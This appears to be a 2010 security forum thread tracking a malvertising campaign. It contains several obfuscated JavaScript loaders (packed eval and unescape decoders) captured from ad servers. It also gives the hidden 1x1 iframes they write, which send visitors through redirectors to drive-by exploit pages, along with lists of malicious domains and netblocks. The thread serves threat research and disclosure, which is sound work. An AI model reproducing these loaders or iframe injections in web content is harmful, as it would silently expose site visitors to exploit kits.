eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 3M={5f:q(m,e,n){m=12.3F(m);5 R=[],M=\'\';x(5 i=0;i<m.j;i+=3){5 11=\'1\';x(5 h=0;h<3;h++){v(i+h<m.j){N=8.o(m.f(i+h))-30;v(N.j<2)N=\'0\'+N}3K 5a;11+=N}R.2t(11+\'1\')}x(5 k=0;k<R.j;k++){5 P=8.13(R[k],e,n);5 L=P.X(16);V(L.j<7)L=\'0\'+L;M+=L}M=M.3R(3P 3O(\'^+|+$\',\'g\'),\'\');b 8.2r(M)},3N:q(c,d,n){c=8.2p(c);5 G=[],U=\'\',18=\'\';x(5 i=0;i<c.j;i+=7)G.2t(c.Y(i,7));x(5 u=0;u<G.j;u++)v(G[u]==\'\')G.5b(u,1);x(5 u=0;u<G.j;u++){5 P=8.13(Z(G[u],16),d,n)+\'\';U+=P.Y(1,P.j-2)}x(5 u=0;u<U.j;u+=2)18+=8.a(Z(U.Y(u,2),10)+30);b 12.3Q(18)},o:q(a){b t.o(a)},a:q(2u){b t.a(2u)},17:q(g,l){b g-(l*58.59(g/l))},13:q(2s,14,19){5 W=1,i=0,O=2s;V((14>>i)>0){v(((14>>i)&1)==1)W=8.17((W*O),19);O=8.17((O*O),19);i++}b W},2r:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i+=2){5 I=Z(\'\'+B.f(i)+B.f(i+1),16).X(10);J+=t.a(I)}b J},2p:q(B){b B;5 J=\'\';x(5 i=0,Q=B.j;i<Q;i++){5 I=t.o(B.f(i)).X(16);J+=I.j==2?I:\'0\'+I}b J}};5 t={F:{3J:{2v:2q,2B:2w,2z:2A,2y:2x,2n:2o,2e:2d,2b:2c,2a:29,2g:2f,2m:2l,2j:2k,2i:2h,2D:2C,2Y:2X,28:2W,2U:2T,31:2Z,35:36,32:34,2S:33,2I:2R,2H:2J,2E:2G,2K:2F,2Q:2L,2O:2P,2N:2M,1M:37,1r:1p,1t:1u,1q:1x,1w:1v,1C:1B,1z:1A,1y:1o,1m:1D,1f:1d,1a:1c,1e:1b,1l:1n,1k:1g,1h:1j,1s:1i,1Y:27,1X:1Z,1U:1W,20:1V,26:21,24:25,1E:22,1T:23,1J:1S,1I:1K,1F:1H,1L:1G,1Q:1R,1N:1P,2V:1O,4v:3c,38:4r,4u:4t,4p:4s,4w:4q,4A:4B,4y:4z,4n:4o,4e:4d,4b:4c,4a:49,4g:4f,4m:4l,4D:4k,4h:4j,4C:4i,4Y:4H,4X:4Z,4U:4W,51:4V,52:55,53:56,50:54,4I:4S,4T:4J,4E:4G,4K:4F,4Q:4L,4P:4R,4M:4O,4x:4N,3t:47,3s:3u,3p:3r,3v:3q,3B:3w,3z:3A,3y:3x,3n:3o,3e:3d,3b:48,3a:39,3g:3f,3m:3l,3j:3k,3i:3h,3D:3C,3Z:3Y,3W:3X,3V:3U,41:40,45:46,42:44,3T:43,3I:3S},3H:{2q:2v,2w:2B,2A:2z,2x:2y,2o:2n,2d:2e,2c:2b,29:2a,2f:2g,2l:2m,2k:2j,2h:2i,2C:2D,2X:2Y,2W:28,2T:2U,2Z:31,36:35,34:32,33:2S,2R:2I,2J:2H,2G:2E,2F:2K,2L:2Q,2P:2O,2M:2N,37:1M,1p:1r,1u:1t,1x:1q,1v:1w,1B:1C,1A:1z,1o:1y,1D:1m,1d:1f,1c:1a,1b:1e,1n:1l,1g:1k,1j:1h,1i:1s,27:1Y,1Z:1X,1W:1U,1V:20,21:26,25:24,22:1E,23:1T,1S:1J,1K:1I,1H:1F,1G:1L,1R:1Q,1P:1N,1O:2V,3c:4v,4r:38,4t:4u,4s:4p,4q:4w,4B:4A,4z:4y,4o:4n,4d:4e,4c:4b,49:4a,4f:4g,4l:4m,4k:4D,4j:4h,4i:4C,4H:4Y,4Z:4X,4W:4U,4V:51,55:52,56:53,54:50,4S:4I,4J:4T,4G:4E,4F:4K,4L:4Q,4R:4P,4O:4M,4N:4x,47:3t,3u:3s,3r:3p,3q:3v,3w:3B,3A:3z,3x:3y,3o:3n,3d:3e,48:3b,39:3a,3f:3g,3l:3m,3k:3j,3h:3i,3C:3D,3Y:3Z,3X:3W,3U:3V,40:41,46:45,44:42,43:3T,3S:3I}},o:q(a,r){r=r||\'3J\';v(!8.F[r])b 3G;a=a.5g(0);b(a 3E 8.F[r])?8.F[r][a]:a},a:q(o,r){r=r||\'3H\';v(!8.F[r])b 3G;o=(o 3E 8.F[r])?8.F[r][o]:o;b 5m.5h(o)}};5 12={w:"5l+/=",3F:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;V(i<p.j){H=t.o(p.f(i++));C=t.o(p.f(i++));D=t.o(p.f(i++));K=H>>2;E=((H&3)<<4)|(C>>4);z=((C&15)<<2)|(D>>6);y=D&5i;v(3L(C))z=y=S;3K v(3L(D))y=S;s=s+8.w.f(K)+8.w.f(E)+8.w.f(z)+8.w.f(y)}b s},3Q:q(p){5 s=\'\',H,C,D,K,E,z,y,i=0;p=p.3R(3P 3O(\'[^A-5j-5e-9+/=]\',\'g\'),\'\');V(i<p.j){K=8.w.T(p.f(i++));E=8.w.T(p.f(i++));z=8.w.T(p.f(i++));y=8.w.T(p.f(i++));H=(K<<2)|(E>>4);C=((E&15)<<4)|(z>>2);D=((z&3)<<6)|y;s=s+t.a(H);v(z!=S)s=s+t.a(C);v(y!=S)s=s+t.a(D)}b s}};5d(3M.3N(\'57\',\'5c\',\'5k\'));',62,333,'|||||var|||this||chr|return||||charAt||||length|||||ord|input|function|dir|output|ASCII||if|alphabet|for|enc4|enc3||str|chr2|chr3|enc2|translations|decryptarray|chr1|bte|result|enc1|chunk|coded|tmpstr|basepow2|resultmod|len|asci|64|indexOf|deencrypt|while|accum|toString|substr|parseInt||tmpasci|BASE64|powmod|exp|||mod|resultd|modulus|1028|175|170|168|1031|1025|179|1169|184|180|1110|1030|1168|178|163|156|1115|1114|1105|1116|157|159|1119|158|1032|1118|162|161|1038|165|1040|1044|197|196|1043|1042|195|1045|8250|1047|200|199|1046|198|194|1041|1112|189|188|1108|8470|186|1029|190|192|193|1111|191|1109|185|1035|135|8225|8224|134|133|8230|136|8364|139|8249|1033|138|137|8240|8222|132|strhex|128|hexstr|base|push|num|1026|129|131|1107|8218|130|1027|140|1034|8211|151|150|8226|8221|149|8212|152|154|1113|8482|153|65533|148|8220|143|1039|1048|142|141|1036|144||1106|8217|147|146|8216|145|155|1050|242|1090|1089|201|240|1088|243|1091|246|1094|1093|245|244|1092|1087|239|1082|235|234|1081|1080|233|1083|236|238|1086|1085|237|1084|247|1095|in|encode|null|php2js|1103|js2php|else|isNaN|RSA|decrypt|RegExp|new|decode|replace|255|1102|250|1098|1097|249|248|1096|251|1099|1101|254|253|1100|252|232|241|211|1059|1058|210|209|1057|212|1060|1063|216|215|214|213|1061|1056|208|1052|205|202|204|203|1051|1049|1053|1079|1055|207|1054|206|1064|1062|1074|227|226|217|1072|225|1075|228|1078|231|230|1077|1076|229|224|1073|1067|220|219|1066|1065|218|1071|1068|1069|1070|223|221|222|14278a4166c9380ac458311916360d320202bb86b930868de0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1471971cdf196c8d51926ae031d1e0e34408e81aa42311926ae031d1e0e34408e81aa42311926ae031d1e0e34408e82e01ebe13b5b8921e59ff0c262410dad1c80197aa509dbe6215669ff17a560e2d1f91900625f80d2722717a560e039bb3c00625f825ae78e0e13cb21258e1404e379f10fe89712c00862dc720527c717d02c034f1470e7d06ecd6c1d6e1030d27227197cbeb0fab1f2103f8062e6100a30868de0fab1f2103f8062e6100a1e1722c12cfabc32bd5671aa08a72014a7f23058af0444a601b9232800f0a0012f9519324b1471b9232800f0a00288d4cd324b1472b22812298e48c1abe7fc1c31a481b8dd2524ae18d243aa620eaad043228f2b12c008633e1bc207989712cfa53c1aef996244ecc4004e3291971cdf1dc7bc427b39b72428cd33120e0c0a4ccea0b6abce07781090e5ea6a113ccd41b8b2753056d4b2f823b31418a04276339c34708480723be72e071d33103e701bb42351191e681bf36e21ba9ced11cc9ee2fb918b1db51eb15c7ea72d0cd8413178ce08b7e312efa6e928d72fb1fe79532aabf0814bf52e039357c34408e817f76b20f0fc26156a41018b7aac07b87481f9389c034249a0651f4a0221107042916b26e5abc1aa08a70104be22b2804008c51d217f6eaf2ef39b507c89d621041a700a07af24d338c0c618e123333eb1eaf87c0c9208524d564b200c89720ca440299b66519b25fc2a43a6021aa5ca2bf802405076a109f4cb11205da01e1443e0a03dcb2a3e93d1fc5db5271ccf9139dc3d28188b509fcf13127045b1a75ea029a682e1fd7ae906d11191075ecd28d72fb0e0ead72cf1040037ad36149210d2216a20351d2a01fd00c00210f432d9526533aaed8318bbad250603f105cc50023fef533fc80f2f13b5a2bd059c2bdac3d27a2d5d0f81d15047a6f40a96fe62c17b38250603f048cb38155aa5420e72c1306b9af104c3fe1cb244b1c5b357296b80e126c9e90a3d4bf1d441f21b735cd2f503d60728f5d26560f01d6d73a281d73c2761a8b160ebd50c1b0b701e29692953b551afbffc28c8c71338fdbb1e9d32b032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0159d30830a91b90b6b4a9003e5382da7583252207b0a739100154a0f0ab92322c7d80504ef3430c7559401824f909a5b53089b47c0f839fe10a67e50cca16601b98b40f682d12ca3b7a32dd3e92b18a2e21af0391dc410c07a89c2330ae0a1f859e30ecd77d039357c17c06041e223e224c88df16ebeec01f36c21832aca1a1bf831c750f83243dab10224cc1213b192af495002b3dd832b5c500eb558017d0901265d6a42bf802420e72c120b05220d0e7d01c9f39f1e33b392b2bc4b197d4b433dfa9a2ac25092be16141610f3518026cf16f9a32136829f2ee53d129b255f20de0c30141d0c2e6100a234293d16a743a22a72a92f171c331d29f91e33b3912d66721bc1c621d4e6b909510b233592100709a1d19e1a2a0659cd72200785349135f317b72a113a30829a682e084b0af24eb2261aec0c125b2b5909c6c6404ba64a0c864b312c5e1b18165871081ac90cfb6380c640d82c2c39f2392b342d20f892420fe2217c9a306298f114ce3960d3c68d01f175f2f558592a6c7c226e045321252ec05124cd2d3783620d9f461ec13152779a4a1c7680f222522901f175f1fe6684191bb5a296b80e0abb7f423d8c4c09e812d112f6ca2ebea001a117e413d302c1b3e3c41fd00c02be03ee127e0d2020c8430a53352137d7b21f55e2b347c220152ff8613774d6032ba711871ce2097a8c11c4ae441ffa2ee200e857240653a053497f1319db11eed7d32cfa53c1ec4bb0205d17822d15782bc2b9907d51d603aeb8820823ec2c8aafa2948ca918a700b0c859be096c52804263a32e20d2804012ab06a124908afab7299a8ba2ea0ec91e2528d115dcd107f9c7f33b6cc801f175f172f5ce12cfabc040c00e04ad1711d2a69b12a53152f34e2d281d73c1ec4bb00f5d6ba2d982a41bbb17621659d81c5b3571d88ad931954b71add61e1cea70a06591061c0c8821cf8ea2010d47d23db96b21424b4210dda62e4dbf106cc8b51fc5db502ba6f82b7d5b21aaa55f1cfeb090ac92603111ffd2eb7cd217abdb32be03ee044c1a6018269021c777f2123c2022e2f411e6a3a923ed37220002801792714306b9af0d0e7d01c9f39f1e33b3934941e00a53352137d7b21f55e2b347c2202421be3|Math|floor|break|splice|29819039|eval|z0|encrypt|charCodeAt|fromCharCode|63|Za|55721041|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|String'.split('|'),0,{}))

This causes two hidden iframes. The first to the trendanalytics2010.co.cc leads you to the drive by, the second just keeps stats/tabs on clients hitting the malvertising domains:

Code: [Select]
<iframe width="1" height="1" style="visibility: hidden;" src="http://trendanalytics2010.co.cc/colombo.php?n=cust1">
<iframe width="1" height="1" style="visibility: hidden;" src="http://js.zedo.com.rc1.hiskweb.com/stats_js_e.php?id=223417424">

**EDIT**

I uploaded the sample I posted to JSUnpack and it validates it. The report is as below:
http://jsunpack.jeek.org/dec/go?report=8442c03b07e2de6a49068fb3e5b1d1ae9bf7e3fa
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 01, 2010, 05:40:38 pm
Drive By:
http://hkuos.com/vd/ncdka.php - Yesterday
http://polkj.com/ch/jqpqzlq.php - Today

Redirectors:
http://ailerry.co.cc/kleopatra.php?n=cust12 - Yesterday
http://almodial.co.cc/gtrsp.php?n=cust12 - Today
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 02, 2010, 05:42:56 pm
Drive By:
http://qxitr.com/fv/_hsj.php

Redirectors:
http://chelleak.co.cc/gtrsp.php?n=cust12
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 06, 2010, 08:32:19 pm
Seeing some stuff move into a new netblock recently:

89.248.174.0/23

Malvertising servers:
view.atdmt.com.risoton.com - jsunpack report here (http://jsunpack.jeek.org/dec/go?report=be928c863aaeb55d18563f9016300d3d2dfe9fa9)
view.ads.cheratic.com
view.atdmt.com.tessane.com


Redirector:
http://benzele.co.cc/jakomo.php?n=cust1

The driveby/exploit domains remain within the 194.8.250.0/24 netblock.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 06, 2010, 09:01:09 pm
More domains active in the malvertising netblock:

media.fastclick.net.timoton.com

Haven't seen the hidden iframes inside of this obfuscated javascript, it will probably be switched on at later date given the netblock it lives in. Also MSN/Live.com are currently using this advertising service.

**EDIT**
And its already swapped over to redirecting to drivebys:
http://jsunpack.jeek.org/dec/go?report=8f1e9fa5b9651e1fdb135997cd15f0d8ec42a014

http://mildron.co.cc/jiqasdir.php?n=cust11
http://jgtee.com/ww/wnuajoz.php
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 13, 2010, 10:19:00 pm
URL's are changing up slightly today:

http://statpc.in/x/?src=sftmaster2&id=av1&o=o

Net has moved for the drive by's as well, to another already known bad actor:

91.188.59.55
http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=91.188.59.55

Differnt driveby style site as well, this is more of a scanner page.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on July 14, 2010, 05:24:58 pm

http://tosoft.in/x/?src=sftmaster2&id=av5&o=o
http://resolvenews.in/x/?src=sftmaster2&id=av5&o=o
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on August 06, 2010, 05:37:24 pm
facilitatedigital.net

For the last day or so people logging into mail.live.com, menshealth.com and a bunch of others have been getting malvertising redirecting them to drive by sites. However, they have been flipping the switch on and off for redirecting to the drive bys.

Example URL that serves up obfuscated javascript that does not contain the drive by:

http://facilitatedigital.net/rc/js/ld/?fn=11a&sid=1112535&dpn=75zh1&fp=n&ctp=y9i12

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Thu, 05 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 1087


var MPvpZm=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var GsZiFN=thi
s;var kkMsoVj=GsZiFN [MPvpZm];var oxdh=new String('unescape');var ugoi=GsZiFN [ox
dh];var HIhVN='6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q9
6Jk6aM6aa6ak6nn6/n6J_6a96JM6Qa6Jk6JJ6nR6aQ6JM6Q/6Q/6Q96ak6nn6/_6ak6na6/J6ak6na6/J
6QQ6QQ6QQ6a16JJ6JG6JU6JQ6JM6Q/6J16Jk6Q/6QQ6JA6Qa6Jl6a16Jn6JA6JR6ak6na6/J6aQ6a96Q/
6J_6Qa6JQ6Jk6Q/6nR6aQ6kA6Ja6JG6J_6J16Jl6aQ6ak6nn6/k6ak6nn6/n6JU6JR6JQ6a96Qn6Qa6Jn
6nR6aQ6JM6Q/6Q/6Q96nP6aA6aA6JJ6J_6Jn6JU6JG6JU6Q/6J_6Q/6Jk6J/6JU6JQ6JU6Q/6J_6JG6a1
6J16Jk6Q/6aA6Ja6J/6Ja6aA6/J6JG6JU6JQ6JM6Q/6/16Jk6Q/6aA6n_6nJ6n96QM6nJ6n96n96kA6n9
6n/6a16JP6Q96JQ6aQ6a96Ja6JA6Qa6J/6Jk6Qa6nR6aQ6n96aQ6a96ak6nn6/k6ak6nn6/n6aA6J_6ak
6nn6/k6aa6aU6aU6nl69P69P69P';var _Mge='WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JH
MdKUk5PB:8Ai/luIop%CS1benrhqg';var XOy='F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-D
ysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN';var cYS='';var _eTy;var irIk;for(_eTy=0;_eTy<HIhV
N.length;_eTy++){ irIk=XOy.indexOf(HIhVN.charAt(_eTy));if(irIk>-1){ cYS+=_Mge.cha
rAt(irIk);}}kkMsoVj(ugoi(cYS));


Then some of the adverising servers in the same netblock (media.topsann.com) will *sometimes* serve up the obfuscated javascsript that redirects to the drive by:

JSUnpack report: http://jsunpack.jeek.org/dec/go?report=812b87a1ed2c803ceb6b81671f99107280d2d241

URL: http://media.topsann.com/ad/js/ld/?chn=22a&bfx=16tz516&sid=176552&zed=81963&fl=no&rtr=y

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Fri, 06 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3652


var bibak=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var Thhx=this;v
ar EDTmvV=Thhx [bibak];var sxMKjk=new String('unescape');var Uzym=Thhx [sxMKjk];v
ar Hz_c='TjBTZ8TZsTX=TZsTX/TX8TZsTXUTXyTvjT8UTvjTvATXcTXWTZZTvjTssTX=TZsTXWTvATXc
TXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvy
TvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvjTvUTvjTXcTXWTZZTvjTssTX=TZsTXWTvA
TXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXy
TW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZs
TXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTZ8TZWTXvTZ8TZsTZvTX/TXcTXZTvAT8jTvyTvjTXc
TXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/
TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXp
TsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTXyTX=TZ8TZsTs/TXcTXsTXWTZATspTXXTvATvvTvjTvv
Tv/TvUT8=Tv/Tv/Tv/TvjTvpTvjTvAT8=T8jT8jT8jTvjTvBTvjT8XT8jTvjTvBTvjT8XT8jTv/T8nTjB
TjBTZXTX=TZvTvjTX=TXyTXyTWpTZsTvjT8UTvjTvvTvvT8nTjBTZXTX=TZvTvjTXUTZsTX8TXATvjT8U
TvjTX=TXyTXyTWpTZsTvcTXUTX=TZsTX8TXATvATZ8TZsTX=TZsTX/TX8TZsTXUTXyTv/T8nTjBTjBTjB
TjBTX/TXXTvjTvATvjTXUTZsTX8TXATvjTv=T8UTvjTXcTZWTXyTXyTvjTv/TvjTZnTjBTXsTXpTX8TZW
TXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZv
TX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=
TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTZsTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8W
T8vTvXTZ8T8UT8jTvXTXWT8UT8=TvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZs
TZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8jTvZTvjTXATXWTX/TXZTXATZs
T8UTvZT8jTvZTvjTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjB
TZUTvjTvjTXWTXyTZ8TXWTvjTvjTZnTjBTjBTj/Tj/TjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/
TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8U
TvZTXATZsTZsTZjT8BTvpTvpTXUTXWTZ8TXpTXUTXpTZsTvcTX8TXpTvcTX8TX8TvpTZvTX8TZvTXsTX8
TZATvcTZjTXATZjT8pTXZTXBT8UTX8TZWTZ8TZsT8=T8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTvjTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8
TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTXBTZ8TWp
TXWTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTjBTjBTjBTZUTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXc
TXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX=TvjTXATZvTXWTXXT8UTvZTXATZsTZsTZjTvWT88Ts=TvW
T8vTsXTvWT8vTsXTZZTZZTZZTvcTXvTX/TXZTX8TXpTXUTXUTXWTZvTX8TXWTvcTX8TXpTXUTvWT8vTsX
TvWT88TsXTXATZvTXWTXXTvWT88TssT8ZTXsTXUTvUT8=TvZTvjTZsTX=TZvTXZTXWTZsT8UTvZTWpTXv
TXyTX=TXcTXnTvZTvWT88TsWTvWT88Ts8TX/TXUTXZTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTXvTXsTXvTvpTX=TsvTX/TXZTs8
TXpTXUTXUTXWTZvTX8TXWTvpT8ZT8vT8ATZAT8/T8jTZ8TZsTX=TZsTvcTXZTX/TXXTvZTvjTXvTXpTZv
TXsTXWTZvT8UTvZT8jTvZTvjTvWT88TsWTvWT88Ts8TvpTX=TvWT88TsWTvvTv/Tv/T8nTjBTjBTjB';v
ar DpdNZ='mEeYnB0osA1-6SC:raMQ=XFyK/5&PpD_I2xLH3OZjqJwb4dV9RWfgv.l7ktiuzhNc%T?G8U
';var t_H='3caPmnjI6B=JX0yOVCS-9op5u_Wf1iUY.v2%K8MxlE7hDs:?/wQ4LtHqZFGd&NbReTkgzA
r';var rSE='';var Jnox;var t_dIH;for(Jnox=0;Jnox<Hz_c.length;Jnox++){ t_dIH=t_H.i
ndexOf(Hz_c.charAt(Jnox));if(t_dIH>-1){ rSE+=DpdNZ.charAt(t_dIH);}}EDTmvV(Uzym(rS
E));

This causes a hidden iframe to be written that causes the client to hit a redirect to a driveby:

Code: [Select]
<iframe src='http://mesomot.co.cc/rcrdcx.php?gj=cust12' style='visibility:hidden;' width='1' height='1' ></iframe><iframe src='http://media.topsann.com/stats_js_e.php?id=176552' style='visibility:hidden;' width='1' height='1' ></iframe>
The co.cc domain redirects then to the actual driveby located here:
http://uyyty.com/qu/sjmba.php

This drive by is again single shot and subsequent visits to it will not serve up exploits, it will usually just redirect to google.com.